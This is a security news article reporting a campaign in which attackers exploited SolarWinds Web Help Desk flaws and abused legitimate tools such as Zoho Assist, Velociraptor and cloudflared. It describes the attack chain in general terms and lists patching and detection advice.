Hackers exploit SolarWinds WHD flaws to deploy DFIR tool in attacks

Source: Bleeping Computer

Hackers are exploiting SolarWinds Web Help Desk (WHD) vulnerabilities to deploy legitimate tools for malicious purposes, such as the Zoho ManageEngine remote monitoring and management tool. The attackers targeted at least three organizations, leveraged Cloudflare tunnels for persistence, and used the Velociraptor cyber incident response tool for command‑and‑control (C2).

The malicious activity was spotted over the weekend by researchers at Huntress Security, who believe it is part of a campaign that started on January 16 and leveraged recently disclosed SolarWinds WHD flaws.

“On February 7, 2026, Huntress SOC analyst Dipo Rodipe investigated a case of SolarWinds Web Help Desk exploitation, in which the threat actor rapidly deployed Zoho Meetings and Cloudflare tunnels for persistence, as well as Velociraptor for means of command and control,” – Huntress.

According to the cybersecurity company, the threat actor exploited CVE‑2025‑40551 (flagged by CISA as actively exploited) and CVE‑2025‑26399. Both vulnerabilities received a critical severity rating and can be used to achieve remote code execution on the host machine without authentication.

Microsoft security researchers also observed a multi‑stage intrusion involving internet‑exposed SolarWinds WHD instances, though they did not confirm exploitation of the two specific vulnerabilities.

Attack chain and tool deployment

After gaining initial access, the attacker:

• Installed the Zoho ManageEngine Assist agent via an MSI file fetched from the Catbox file‑hosting platform, configured it for unattended access, and registered the compromised host to a Zoho Assist account tied to an anonymous ProtonMail address.
• Used the tool for direct hands‑on keyboard activity and Active Directory (AD) reconnaissance.
• Deployed Velociraptor, fetched as an MSI file from a Supabase bucket. Velociraptor is a legitimate digital forensics and incident response (DFIR) tool that has been abused in ransomware attacks. In these incidents, the DFIR platform was used as a C2 framework communicating via Cloudflare Workers.
• Utilized an outdated Velociraptor version 0.73.4, which contains a privilege‑escalation flaw allowing permission escalation on the host.
• Installed cloudflared from Cloudflare’s official GitHub repository, using it as a secondary tunnel‑based access channel for C2 redundancy.
• Achieved persistence in some cases via a scheduled task (TPMProfiler) that opens an SSH backdoor through QEMU.
• Disabled Windows Defender and the firewall via registry modifications, then downloaded a fresh copy of the VS Code binary.

Attack chain – Source: Huntress

Security updates and mitigation

• Upgrade SolarWinds Web Help Desk to version 2026.1 or later.
• Remove public internet access to SolarWinds WHD admin interfaces.
• Reset all credentials associated with the product.
• Deploy the Sigma rules and indicators of compromise shared by Huntress to detect Zoho Assist, Velociraptor, cloudflared, VS Code tunnel activity, silent MSI installations, and encoded PowerShell execution.

Neither Microsoft nor Huntress attributed the observed attacks to any specific threat group, and details about the targets were limited to Microsoft characterizing the breached environments as “high‑value assets.”